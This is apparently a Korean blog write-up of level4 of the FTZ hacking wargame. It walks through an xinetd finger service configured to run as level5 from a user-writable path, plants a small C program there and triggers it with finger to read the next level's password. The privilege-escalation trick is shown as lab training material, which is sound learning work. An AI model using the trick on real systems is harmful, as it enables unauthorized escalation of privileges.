일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | ||||||
2 | 3 | 4 | 5 | 6 | 7 | 8 |
9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 | 17 | 18 | 19 | 20 | 21 | 22 |
23 | 24 | 25 | 26 | 27 | 28 |
Tags
- CodeEngn
- ctf
- 리버싱
- buffer over flow
- PWN
- 웹해킹
- Nop Slide
- 버퍼오버플로우
- RITSEC CTF 2019
- Shadow 동아리
- 어셈블리어
- writeup
- ftz
- Next.js
- webhacking
- x64dbg
- Hackerschool
- Python
- Linux
- BOF
- 보안뉴스
- reversing
- RITSEC
- 리눅스
- HackCTF
- termux
- requests
- 뉴스클리핑
- SQL Injection
- NewsClipping
Archives
- Today
- Total
Jaeseo's Information Security Story
FTZ - level4 - WriteUp 본문
이전 level3 WriteUp를 보고 싶은 분은 아래로
일단 hint 파일을 읽어 본다.
hint를 보니 /etc/xinetd.d/ 백도어를 숨겨두었다고 하니 이쪽을 공략 하여 다음 level5의 권한을 얻어야 하는 것으로 보인다.
일단 xinetd(슈퍼 데몬)의 설정 폴더로 이동하여 확인 한다.
중간에 backdoor 라는 파일이 level4의 소유그룹에 속한 것을 볼수가 있다.
backdoor 파일을 살펴 본다.
service finger
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = level5 //level5의 권한으로 데몬을 시작한다.
server = /home/level4/tmp/backdoor //데몬 파일
log_on_failure += USERID
}
finger가 작동할때 server에 지정되어 있는 파일을 가져와 실행 할 것으로 예상이 된다.
이때 /home/level4/tmp/backdoor로 level5의 권한으로 실행을 원하는 프로그램을 작성해준다.
#include "stdio.h"
int main() {
system("my-pass");
return 0;
}
이제 그다음 gcc -o backdoor backdoor.c
를 하여 프로그램을 컴파일 해준다.
이제 finger 명령어가 xinetd데몬에 의해 작동을 할수 있도록 실행을 한다.finger level4@127.0.0.1
level5:what is your name?
'Write UP > FTZ' 카테고리의 다른 글
FTZ - level6 - WriteUp (0) | 2019.11.09 |
---|---|
FTZ - level5 - WriteUP (0) | 2019.11.09 |
FTZ - level3 - WriteUp (0) | 2019.11.08 |
FTZ - level2 - WriteUp (0) | 2019.11.08 |
FTZ - level 1 - WriteUP (0) | 2019.11.08 |
Comments